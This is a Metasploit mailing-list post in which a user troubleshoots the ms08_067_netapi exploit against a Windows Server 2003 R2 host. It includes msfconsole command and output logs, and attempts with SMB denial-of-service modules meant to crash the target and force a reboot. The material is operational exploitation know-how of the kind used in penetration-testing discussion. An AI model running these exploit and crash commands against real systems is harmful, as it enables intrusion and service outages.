Re: Unreliable exploitation with ms08_067_netapi ?

[Richard Miles <richard.k.miles () googlemail com>]

Again, very informative. Thanks.

> http://www.immunitysec.com/downloads/MacroReliability.odp
> Slide 21 (and 19 for the share name, but printers turned out to work better)

Very interesting document. This product from immunity appear to be
nice, if it does all it claims...

> Restarting doesn't work because the services end up in different
> processes. You can, however set SMBPIPE to "SRVSVC", but this might
> require authentication if simple file sharing is not enabled on a newer
> version of Windows.

Nice to now, more one shot. Router is not a option for this vuln?

> You can set SMBUser/SMBPass in the exploit and it should be able to
> fingerprint the language properly.

I get surprised it do not appear when I call show options.

My first try was strange.

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

My credential is a network credential of a restricted user, so I did
guessed a parameter name...

msf exploit(ms08_067_netapi) > set SMBDomain mydomainname.tld

And I was all curious to see the magic.

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[-] Could not determine the exact language pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.

The result was exactly the same as without credential. I'm missing something?

I also used SRVSVC and target 9 (NX) as suggested.

msf exploit(ms08_067_netapi) > set target 9
target => 9
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[-] Exploit failed: Connection reset by peer
[*] Exploit completed, but no session was created.

Exactly the same.

> > I also was thinking, this exploit do not restart the machine if the
> > exploitation fail, if the box is vulnerable it's very probable the
> > target also will be SMBv2 DoS, which could help us to force a reboot
> > to give another try. There is such a exploit at Metasploit?
>
> There are a number of SMB DoS bugs under auxiliary/dos/windows/smb/,
> including some for SMBv2 flaws.

Based on a target vuln to ms08-067 do you suggest me some in special?

I tried without success.

msf auxiliary(ms09_001_write) > exploit

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue

Nothing happened.

msf auxiliary(rras_vls_null_deref) > exploit

[*] Binding to 8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:10.1.1.1[\ROUTER]
...
[-] Auxiliary failed: RuntimeError Could not bind to
8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:10.1.1.1[\ROUTER]
[-] Call stack:
[-]   /test/trunk/lib/rex/proto/dcerpc/client.rb:266:in `bind'
[-]   /test/trunk/lib/rex/proto/dcerpc/client.rb:47:in `initialize'
[-]   /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `new'
[-]   /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `dcerpc_bind'
[-]   (eval):66:in `run'
[*] Auxiliary module execution completed
msf auxiliary(rras_vls_null_deref) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC

msf auxiliary(ms06_063_trans) > exploit

[*] Connecting to the target system...
[*] Sending bad SMB transaction request 1...
[*] Sending bad SMB transaction request 2...
[*] Sending bad SMB transaction request 3...
[*] Sending bad SMB transaction request 4...
[*] Sending bad SMB transaction request 5...
[*] Auxiliary module execution completed

nothing happen.

msf auxiliary(ms09_050_smb2_session_logoff) > exploit

[*] Targeting host 10.1.1.1:445...
[*] Sending the exploit packet (192 bytes)...
[*] Response received. The target system is not vulnerable:
"\000\000\000#\377SMBr\002\000\001\000\230S\210\002\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
[*] Auxiliary module execution completed

Failed.
msf auxiliary(rras_vls_null_deref) > exploit

Most of the others the connection is reseted by per, probable because
the previous failed exploitation at ms08_067?

msf auxiliary(ms09_050_smb2_session_logoff) > exploit

[*] Targeting host 10.1.1.1:445...
[*] Sending the exploit packet (192 bytes)...
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-]   /test/trunk/lib/rex/io/stream.rb:44:in `syswrite'
[-]   /test/trunk/lib/rex/io/stream.rb:44:in `write'
[-]   /test/trunk/lib/rex/io/stream.rb:140:in `timed_write'
[-]   /test/trunk/lib/rex/io/stream.rb:171:in `put'
[-]   (eval):63:in `run'
[*] Auxiliary module execution completed

[*] Binding to 8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:10.1.1.1[\SRVSVC]
...
[-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The
server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162
WordCount=0)
[-] Call stack:
[-]   /test/trunk/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
[-]   /test/trunk/lib/rex/proto/smb/client.rb:1011:in `create'
[-]   /test/trunk/lib/rex/proto/smb/client.rb:985:in `create_pipe'
[-]   /test/trunk/lib/rex/proto/smb/simpleclient.rb:280:in `create_pipe'
[-]   /test/trunk/lib/rex/proto/dcerpc/client.rb:128:in `smb_connect'
[-]   /test/trunk/lib/rex/proto/dcerpc/client.rb:65:in `socket_check'
[-]   /test/trunk/lib/rex/proto/dcerpc/client.rb:40:in `initialize'
[-]   /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `new'
[-]   /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `dcerpc_bind'
[-]   (eval):66:in `run'

> It would be odd to have an AV product new enough to catch this as but
> installed on a system unpatched against a vuln from 2008.

I was reading the post again more carefully and it told that what
catch was a overflow protection of the AV. I will consider buy a
mcafee av.

2008...long time. ms08_067 is the last exploit (for the last vuln)
that affect most windows attacking directly, not? I mean, without talk
about client-sides, or other services, just talking about native
services from Microsoft installed by default like file sharing, RPC,
etc. Or there is a better one to test?

> I tried at one point and couldn't find any working combinations of
> opcodes. This is kind of pointless in the real world, as you would need
> to know exactly the right patch level to choose the correct target.

Too bad. What about the major versions without any patch? Like

Windows Server 2003 R1 + combination with service packs
Windows Server 2003 R2 + combination with service packs
etc

Looks a good idea?

> > Humm... for this kind of exploit is impossible to brute force this
> > address values, like in old overflows where ret brute force was
> > possible? I mean, if used together with a SMBv2 DOS exploit it could
> > work, not? Or exploitation is too different on recent days?
>
> Too different. The SP2 targets use 5 different hardcoded addresses; you
> can try building targets for as many combinations as possible, then
> cycling the targets, but each target will take a few hours to get right.

First I have to make a smb DOS exploit work after a failed
exploitation on ms08_067, then I will move to this idea. 5 different
hardcoded address appear a lot of stuff for a few hours. I believe you
are thinking in some optimization, like a minimum and maximum address
for this addresses, not?

Thanks again.

Rick
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework